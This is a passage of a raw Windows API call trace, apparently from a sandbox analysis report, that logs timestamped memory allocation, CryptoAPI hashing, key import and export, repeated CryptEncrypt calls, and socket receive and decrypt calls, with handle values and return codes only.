dwFlags=0x0) returned 1 [0145.367] malloc (_Size=0x14) returned 0x3f651e0 [0145.368] free (_Block=0x0) [0145.368] CryptGetHashParam (in: hHash=0x432978, dwParam=0x2, pbData=0x3f651e0, pdwDataLen=0x37dfacc, dwFlags=0x0 | out: pbData=0x3f651e0, pdwDataLen=0x37dfacc) returned 1 [0145.368] CryptHashData (hHash=0x432df8, pbData=0x3def218, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0145.368] free (_Block=0x3f651e0) [0145.368] CryptDestroyHash (hHash=0x432978) returned 1 [0145.368] free (_Block=0x3def218) [0145.368] free (_Block=0x3def010) [0145.368] malloc (_Size=0x1fd) returned 0x3def010 [0145.368] free (_Block=0x0) [0145.368] malloc (_Size=0x94) returned 0x36918f0 [0145.368] free (_Block=0x0) [0145.368] malloc (_Size=0x94) returned 0x3df04b8 [0145.368] free (_Block=0x0) [0145.368] free (_Block=0x0) [0145.368] free (_Block=0x36918f0) [0145.368] CryptImportKey (in: hProv=0x3e57b0, pbData=0x37df5b8, dwDataLen=0x190, hPubKey=0x0, dwFlags=0x1, phKey=0x37df5b4 | out: phKey=0x37df5b4*=0x432978) returned 1 [0145.372] CryptExportKey (in: hKey=0x432978, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x37df21c, pdwDataLen=0x37df204 | out: pbData=0x37df21c*, pdwDataLen=0x37df204*=0x90) returned 1 [0145.372] CryptExportKey (in: hKey=0x432978, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x37df8e8, pdwDataLen=0x37df5ac | out: pbData=0x37df8e8*, pdwDataLen=0x37df5ac*=0x90) returned 1 [0145.372] malloc (_Size=0x80) returned 0x60a578 [0145.372] free (_Block=0x0) [0145.372] CryptDestroyKey (hKey=0x432978) returned 1 [0145.372] malloc (_Size=0x64) returned 0x60b070 [0145.372] free (_Block=0x0) [0145.372] malloc (_Size=0x80) returned 0x6097a8 [0145.373] free (_Block=0x0) [0145.373] malloc (_Size=0xc0) returned 0x36918f0 [0145.373] free (_Block=0x6097a8) [0145.373] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x37dfa3c | out: phHash=0x37dfa3c) returned 1 [0145.373] CryptHashData (hHash=0x432978, pbData=0x36918f0, dwDataLen=0x81, dwFlags=0x0) returned 1 [0145.373] malloc (_Size=0x14) returned 0x3f65300 [0145.373] free (_Block=0x0) [0145.373] CryptGetHashParam (in: hHash=0x432978, dwParam=0x2, pbData=0x3f65300, pdwDataLen=0x37dfa34, dwFlags=0x0 | out: pbData=0x3f65300, pdwDataLen=0x37dfa34) returned 1 [0145.373] CryptDestroyHash (hHash=0x432978) returned 1 [0145.373] free (_Block=0x3f65300) [0145.373] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x37dfa3c | out: phHash=0x37dfa3c) returned 1 [0145.373] CryptHashData (hHash=0x432978, pbData=0x36918f0, dwDataLen=0x81, dwFlags=0x0) returned 1 [0145.373] malloc (_Size=0x14) returned 0x3f651e0 [0145.373] free (_Block=0x0) [0145.373] CryptGetHashParam (in: hHash=0x432978, dwParam=0x2, pbData=0x3f651e0, pdwDataLen=0x37dfa34, dwFlags=0x0 | out: pbData=0x3f651e0, pdwDataLen=0x37dfa34) returned 1 [0145.373] CryptDestroyHash (hHash=0x432978) returned 1 [0145.374] free (_Block=0x3f651e0) [0145.374] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x37dfa3c | out: phHash=0x37dfa3c) returned 1 [0145.374] CryptHashData (hHash=0x432978, pbData=0x36918f0, dwDataLen=0x81, dwFlags=0x0) returned 1 [0145.374] malloc (_Size=0x14) returned 0x3f652c0 [0145.374] free (_Block=0x0) [0145.374] CryptGetHashParam (in: hHash=0x432978, dwParam=0x2, pbData=0x3f652c0, pdwDataLen=0x37dfa34, dwFlags=0x0 | out: pbData=0x3f652c0, pdwDataLen=0x37dfa34) returned 1 [0145.374] CryptDestroyHash (hHash=0x432978) returned 1 [0145.374] free (_Block=0x3f652c0) [0145.374] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x37dfa3c | out: phHash=0x37dfa3c) returned 1 [0145.374] CryptHashData (hHash=0x432978, pbData=0x36918f0, dwDataLen=0x81, dwFlags=0x0) returned 1 [0145.374] malloc (_Size=0x14) returned 0x3f652c0 [0145.374] free (_Block=0x0) [0145.374] CryptGetHashParam (in: hHash=0x432978, dwParam=0x2, pbData=0x3f652c0, pdwDataLen=0x37dfa34, dwFlags=0x0 | out: pbData=0x3f652c0, pdwDataLen=0x37dfa34) returned 1 [0145.374] CryptDestroyHash (hHash=0x432978) returned 1 [0145.374] free (_Block=0x3f652c0) [0145.374] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x37dfa3c | out: phHash=0x37dfa3c) returned 1 [0145.374] CryptHashData (hHash=0x432978, pbData=0x36918f0, dwDataLen=0x81, dwFlags=0x0) returned 1 [0145.374] malloc (_Size=0x14) returned 0x3f65500 [0145.374] free (_Block=0x0) [0145.374] CryptGetHashParam (in: hHash=0x432978, dwParam=0x2, pbData=0x3f65500, pdwDataLen=0x37dfa34, dwFlags=0x0 | out: pbData=0x3f65500, pdwDataLen=0x37dfa34) returned 1 [0145.374] CryptDestroyHash (hHash=0x432978) returned 1 [0145.374] free (_Block=0x3f65500) [0145.374] free (_Block=0x36918f0) [0145.375] malloc (_Size=0x50) returned 0x3d9aae8 [0145.375] free (_Block=0x0) [0145.375] free (_Block=0x60b070) [0145.375] free (_Block=0x60a578) [0145.375] malloc (_Size=0xb8) returned 0x36918f0 [0145.375] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x36919a0 | out: phHash=0x36919a0) returned 1 [0145.375] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x36919a4 | out: phHash=0x36919a4) returned 1 [0145.375] CryptHashData (hHash=0x432978, pbData=0x37dfa54, dwDataLen=0x14, dwFlags=0x0) returned 1 [0145.375] CryptHashData (hHash=0x4329b8, pbData=0x37dfad4, dwDataLen=0x14, dwFlags=0x0) returned 1 [0145.375] CryptImportKey (in: hProv=0x3cf450, pbData=0x37dfa70, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x37dfa6c | out: phKey=0x37dfa6c*=0x3e1058) returned 1 [0145.375] CryptSetKeyParam (hKey=0x3e1058, dwParam=0x4, pbData=0x74199484*=0x2, dwFlags=0x0) returned 1 [0145.375] CryptImportKey (in: hProv=0x3cf450, pbData=0x37dfa70, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x37dfa6c | out: phKey=0x37dfa6c*=0x3e0e18) returned 1 [0145.375] CryptSetKeyParam (hKey=0x3e0e18, dwParam=0x4, pbData=0x74199484*=0x2, dwFlags=0x0) returned 1 [0145.375] free (_Block=0x3d9aae8) [0145.375] SetEvent (hEvent=0x3a4) returned 1 [0145.375] SetEvent (hEvent=0x3a4) returned 1 [0145.375] free (_Block=0x3df04b8) [0145.375] free (_Block=0x3def010) [0145.375] free (_Block=0x3d81e60) [0145.375] DecryptMessage (in: phContext=0x3d81944, pMessage=0x37dfaec, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37dfaec, pfQOP=0x0) returned 0x80090318 [0145.376] recv (in: s=0x5b0, buf=0x3de7008, len=16413, flags=0 | out: buf=0x3de7008*) returned 543 [0146.350] DecryptMessage (in: phContext=0x3d81944, pMessage=0x37dfaec, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37dfaec, pfQOP=0x0) returned 0x0 [0146.350] malloc (_Size=0x1fd) returned 0x3d81e60 [0146.351] free (_Block=0x0) [0146.351] malloc (_Size=0x1fd) returned 0x3df00e0 [0146.351] free (_Block=0x0) [0146.351] free (_Block=0x0) [0146.351] free (_Block=0x3d81e60) [0146.351] malloc (_Size=0x1fd) returned 0x3d81e60 [0146.351] free (_Block=0x0) [0146.351] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.351] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.351] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.351] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.351] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.351] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.351] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.351] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.351] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.351] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.352] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.352] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.352] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.352] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.352] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.352] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.352] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.352] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.352] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.352] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.352] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.352] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.352] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.352] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.352] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.352] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.352] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.353] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.353] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.353] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.353] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.353] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.353] malloc (_Size=0x1fd) returned 0x3691270 [0146.353] free (_Block=0x0) [0146.353] free (_Block=0x3df00e0) [0146.353] free (_Block=0x3d81e60) [0146.353] malloc (_Size=0x1fd) returned 0x3d81e60 [0146.353] free (_Block=0x0) [0146.353] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.353] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.353] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.353] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.353] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.353] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.353] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.354] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.354] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.354] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.354] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.354] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.354] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.354] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.354] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.354] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.354] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.354] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.354] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.354] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.354] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.354] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.354] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.354] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.354] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.355] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.355] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.355] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.355] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.355] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.355] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.355] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.355] malloc (_Size=0x1fd) returned 0x3df00e0 [0146.355] free (_Block=0x0) [0146.355] free (_Block=0x3691270) [0146.355] free (_Block=0x3d81e60) [0146.355] malloc (_Size=0x1fd) returned 0x3d81e60 [0146.355] free (_Block=0x0) [0146.355] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.355] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.355] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.356] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.356] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.356] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.356] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.356] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.356] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.356] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.356] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.356] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.356] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.356] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: 